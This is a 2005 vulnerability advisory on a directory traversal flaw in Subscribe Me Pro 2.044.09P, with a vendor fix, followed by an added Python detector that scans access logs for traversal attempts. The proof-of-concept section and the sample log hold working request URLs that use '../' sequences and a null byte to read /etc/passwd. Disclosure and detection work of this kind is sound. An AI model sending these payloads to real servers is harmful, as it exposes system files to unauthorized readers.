`
------------------------------------------------------
HYA-2005-006 h4cky0u.org <http://h4cky0u.org> Advisory 007
------------------------------------------------------
Date - Tue Sep 13 2005
TITLE:
======
Subscribe Me Pro 2.044.09P and prior Directory Traversal Vulnerability
SEVERITY:
=========
High
SOFTWARE:
=========
Subscribe Me Pro 2.044.09P and prior
Support Website : http://siteinteractive.com/subpro/
INFO:
=====
Subscribe Me Professional is designed to assist with the building,
maintaining, mailing, and tracking of your customer/prospect mailing lists.
BUG DESCRIPTION:
================
Subscribe Me Pro 2.044.09P and prior are prone to a directory traversal
vulnerability. This issue is due to a failure in the application to properly
sanitize user-supplied input. An unauthorized user can retrieve arbitrary
files by supplying directory traversal strings '../' to the vulnerable
parameter.
POC:
====
Here are some examples:
http://www.site.com/[dir]/s.pl?e=1&subscribe=subscribe&l=../../../../../../../../etc/passwd%00&SUBMIT=%20%20Submit%20%20
http://www.site.com/[dir]/s.pl?e=enter%20your%20email%20address%20here&subscribe=subscribe&l=../../../../../../../../etc/passwd%00
VENDOR STATUS:
==============
Vendor Contact : 13th Sep 2005
Vendor Reply : 13th Sep 2005 - This vulnerability has been fixed in the
latest release : 2.050.01P
FIX:
====
Upgrade to version 2.050.01P
CREDITS:
========
This vulnerability was discovered and researched by -
ShoCK FX of h4cky0u Security Forums.
mail : shockfx at gmail dot com
web : http://www.h4cky0u.org
Co Researcher -
h4cky0u of h4cky0u Security Forums.
mail : h4cky0u at gmail dot com
web : http://www.h4cky0u.org
ORIGINAL ADVISORY:
=================
http://www.h4cky0u.org/advisories/HYA-2005-007-subscribe-me-pro.txt
--
http://www.h4cky0u.org
(In)Security at its best...
`
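A log check for the request pattern this advisory describes, as an added example that is not part of the original advisory or the vendor's code: it scans web access logs for requests to `s.pl` whose `l` parameter, once decoded, contains a NUL byte, a `..` path segment, or an absolute path. The log lines are constructed samples, and the function names and the `/cgi-bin/` location are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines; addresses and the /cgi-bin/ path are placeholders.
SAMPLE_LOG = [
    '192.0.2.10 - - [13/Sep/2005:10:00:01 +0000] "GET /cgi-bin/s.pl?e=a%40example.org&subscribe=subscribe&l=newsletter HTTP/1.0" 200 512',
    '192.0.2.44 - - [13/Sep/2005:10:00:07 +0000] "GET /cgi-bin/s.pl?e=1&subscribe=subscribe&l=../../../../etc/passwd%00 HTTP/1.0" 200 1873',
    '192.0.2.12 - - [13/Sep/2005:10:00:09 +0000] "GET /cgi-bin/s.pl?e=b%40example.org&l=weekly..digest HTTP/1.0" 200 498',
    '192.0.2.51 - - [13/Sep/2005:10:01:00 +0000] "GET /index.html?l=../x HTTP/1.0" 200 100',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def fully_decode(value, max_rounds=3):
    """Undo nested percent-encoding so matching runs on the final string."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_reasons(list_value):
    """Return why a list-name value does not look like a plain list name."""
    v = fully_decode(list_value)
    reasons = []
    if "\x00" in v:
        reasons.append("nul-byte")
    # Match '..' as a whole path segment, not as a substring of a name.
    if ".." in re.split(r"[\\/]", v):
        reasons.append("dot-dot-segment")
    if v.startswith(("/", "\\")):
        reasons.append("absolute-path")
    return reasons

def scan(lines, script="s.pl", param="l"):
    """Yield (client, decoded value, reasons) for flagged requests to the script."""
    hits = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if not url.path.endswith("/" + script):
            continue  # only the affected script is in scope
        for value in parse_qs(url.query, keep_blank_values=True).get(param, []):
            reasons = suspicious_reasons(value)
            if reasons:
                hits.append((line.split()[0], fully_decode(value), reasons))
    return hits
```

Running `scan()` over logs from before the upgrade to 2.050.01P shows whether the parameter was probed; a flagged request with a 200 status and an unusual response size deserves a closer look.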